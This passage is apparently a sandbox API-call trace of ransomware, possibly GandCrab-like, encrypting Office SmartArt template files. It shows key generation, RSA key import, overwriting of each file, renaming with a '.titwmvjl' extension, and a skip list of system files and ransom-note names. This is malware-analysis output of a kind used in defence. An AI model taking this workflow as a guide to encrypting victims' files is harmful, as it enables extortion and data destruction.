(in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.865] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.865] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.865] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.865] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.865] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.866] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.866] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.866] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.870] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.870] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.870] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.870] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.870] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.870] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.871] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.875] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.875] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.875] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.876] GetLastError () returned 0x0 [0078.876] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.876] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.876] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.876] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.876] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.876] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.880] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.881] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.881] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.881] GetLastError () returned 0x0 [0078.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.881] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.882] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.882] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0078.882] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0078.882] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x1930, lpOverlapped=0x0) returned 1 [0078.899] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffe6d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.899] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1930, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x1930, lpOverlapped=0x0) returned 1 [0078.900] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.900] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.902] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.905] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.905] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.905] CloseHandle (hObject=0x2ec) returned 1 [0078.907] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328975[[fn=theme picture accent]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328975[[fn=theme picture accent]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.907] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.907] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.907] lstrcmpW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2=".") returned 1 [0078.908] lstrcmpW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="..") returned 1 [0078.908] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328983[[fn=Theme Picture Alternating Accent]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox" [0078.908] lstrlenW (lpString=".titwmvjl") returned 9 [0078.908] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned 158 [0078.908] VirtualAlloc (lpAddress=0x0, dwSize=0x17c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.908] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox.titwmvjl") returned 167 [0078.908] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned 158 [0078.908] lstrlenW (lpString=".glox") returned 5 [0078.908] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.908] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.908] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.908] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.908] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned 158 [0078.908] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned 158 [0078.908] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="desktop.ini") returned 1 [0078.908] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="autorun.inf") returned 1 [0078.908] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="ntuser.dat") returned 1 [0078.908] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="iconcache.db") returned 1 [0078.908] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="bootsect.bak") returned 1 [0078.908] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="boot.ini") returned 1 [0078.908] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="ntuser.dat.log") returned 1 [0078.908] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="thumbs.db") returned 1 [0078.909] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.909] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.909] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.909] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.909] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.909] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.909] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="ntldr") returned 1 [0078.909] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="NTDETECT.COM") returned 1 [0078.909] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="Bootfont.bin") returned 1 [0078.909] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned 158 [0078.909] lstrlenW (lpString=".glox") returned 5 [0078.909] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.909] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.909] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.909] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.909] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328983[[fn=theme picture alternating accent]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.910] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.910] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.911] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.911] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.911] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.914] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.914] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.915] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.915] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.915] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.915] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.915] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.915] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.915] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.918] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.918] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.918] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.918] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.918] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.918] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.919] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.919] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.921] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.922] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.922] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.922] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.922] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.922] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.922] GetLastError () returned 0x0 [0078.922] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.922] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.922] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.923] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.923] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.926] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5033b8) returned 1 [0078.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.926] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.926] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.926] GetLastError () returned 0x0 [0078.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.926] CryptDestroyKey (hKey=0x5033b8) returned 1 [0078.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.927] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.927] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0078.927] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0078.927] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x15fe, lpOverlapped=0x0) returned 1 [0078.939] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffea02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.939] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15fe, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x15fe, lpOverlapped=0x0) returned 1 [0078.940] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.940] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.942] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.947] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.947] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.947] CloseHandle (hObject=0x2ec) returned 1 [0078.949] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328983[[fn=theme picture alternating accent]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328983[[fn=theme picture alternating accent]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.950] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.950] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.950] lstrcmpW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2=".") returned 1 [0078.950] lstrcmpW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="..") returned 1 [0078.950] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328986[[fn=Theme Picture Grid]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox" [0078.950] lstrlenW (lpString=".titwmvjl") returned 9 [0078.950] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox") returned 144 [0078.950] VirtualAlloc (lpAddress=0x0, dwSize=0x160, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.950] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox.titwmvjl") returned 153 [0078.951] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox") returned 144 [0078.951] lstrlenW (lpString=".glox") returned 5 [0078.951] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.951] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.951] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.951] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.951] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox") returned 144 [0078.951] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox") returned 144 [0078.951] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="desktop.ini") returned 1 [0078.951] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="autorun.inf") returned 1 [0078.951] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="ntuser.dat") returned 1 [0078.951] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="iconcache.db") returned 1 [0078.951] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="bootsect.bak") returned 1 [0078.951] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="boot.ini") returned 1 [0078.952] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="ntuser.dat.log") returned 1 [0078.952] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="thumbs.db") returned 1 [0078.952] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.952] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.952] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.952] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.952] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.952] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.952] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="ntldr") returned 1 [0078.952] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="NTDETECT.COM") returned 1 [0078.952] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="Bootfont.bin") returned 1 [0078.952] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox") returned 144 [0078.952] lstrlenW (lpString=".glox") returned 5 [0078.952] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.952] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.952] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.952] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.953] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328986[[fn=theme picture grid]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 